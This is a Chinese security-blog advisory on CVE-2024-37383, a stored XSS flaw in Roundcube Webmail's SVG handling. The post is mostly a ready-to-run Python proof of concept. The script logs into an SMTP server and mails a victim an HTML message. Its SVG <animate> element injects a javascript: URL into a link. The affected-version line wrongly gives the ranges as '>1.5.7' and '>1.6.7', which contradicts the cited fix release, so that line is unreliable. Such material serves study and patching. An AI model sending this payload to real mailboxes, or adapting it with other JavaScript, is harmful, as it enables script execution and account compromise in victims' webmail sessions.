CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)
CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)
alicy 信安百科 2024-11-02 17:48
0x00 前言
Roundcube Webmail是一个开源的基于web的电子邮件客户端,旨在提供用户友好的界面和强大的功能,使用户能够通过web浏览器方便地访问和管理他们的电子邮件。
Roundcube支持标准的邮件协议(如IMAP和SMTP),并提供了许多常见的邮件功能,如收发邮件、管理联系人、创建日历事件等。其界面简洁直观,易于使用,同时还支持插件扩展,用户可以根据自己的需求定制功能。
Roundcube Webmail被广泛应用于个人用户、企业和组织,为他们提供了一个方便、安全的电子邮件管理解决方案。
0x01 漏洞描述
在Roundcube Webmail中发现了CVE-2024-37383漏洞。这是一个存储的XSS漏洞,允许攻击者在用户页面上执行JavaScript代码。
错误出现在处理电子邮件正文标记中的SVG元素的代码中。在显示电子邮件之前,Roundcube会处理某些标签的内容及其属性。
0x02 CVE编号
CVE-2024-37383
0x03 影响版本
Roundcube Webmail >1.5.7
Roundcube Webmail >1.6.7
0x04 漏洞详情
POC:
https://github.com/bartfroklage/CVE-2024-37383-POC
import smtplib
import argparse
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2024-37383 Proof Of Concept")
parser.add_argument("-e", "--sender_email", required=True, help="Sender's email address")
parser.add_argument("-p", "--sender_password", required=True, help="Sender's email password")
parser.add_argument("-t", "--recipient_email", required=True, help="Recipient's email address")
parser.add_argument("-sh", "--smtp_host", default="smtp.gmail.com", help="SMTP host address")
parser.add_argument("-sp", "--smtp_port", default=587, help="SMTP port number")
args = parser.parse_args()
msg = MIMEMultipart('alternative')
msg["From"] = args.sender_email
msg["To"] = args.recipient_email
msg["Subject"] = "CVE-2024-37383 Proof Of Concept"
text = "Please use HTML view to see this email."
html = """\
<html>
<head></head>
<body>
<svg>
<animate attributeName="href " values="javascript:alert(\'You are powned.\')" href="#link" />
</animate>
<a id="link">
<text x=20 y=20>Click me</text>
</a>
</svg>
</body>
</html>
"""
msg.attach(MIMEText(text, 'plain'))
msg.attach(MIMEText(html, 'html'))
try:
server = smtplib.SMTP(args.smtp_host, args.smtp_port)
server.set_debuglevel(True)
server.starttls()
server.login(args.sender_email, args.sender_password)
server.sendmail(args.sender_email, args.recipient_email, msg.as_string())
server.quit()
print("Email sent successfully.")
except Exception as e:
print("An error occurred:", str(e))
0x05 参考链接
https://github.com/roundcube/roundcubemail/commit/43aaaa528646877789ec028d87924ba1accf5242
https://github.com/roundcube/roundcubemail/releases/tag/1.5.7
推荐阅读:
CVE-2024-42009|Roundcube Webmail跨站脚本漏洞
N/A|Roundcube Webmail存在远程代码执行漏洞(POC)
CVE-2024-9264|Grafana SQL表达式允许远程代码执行(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持
!!!
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。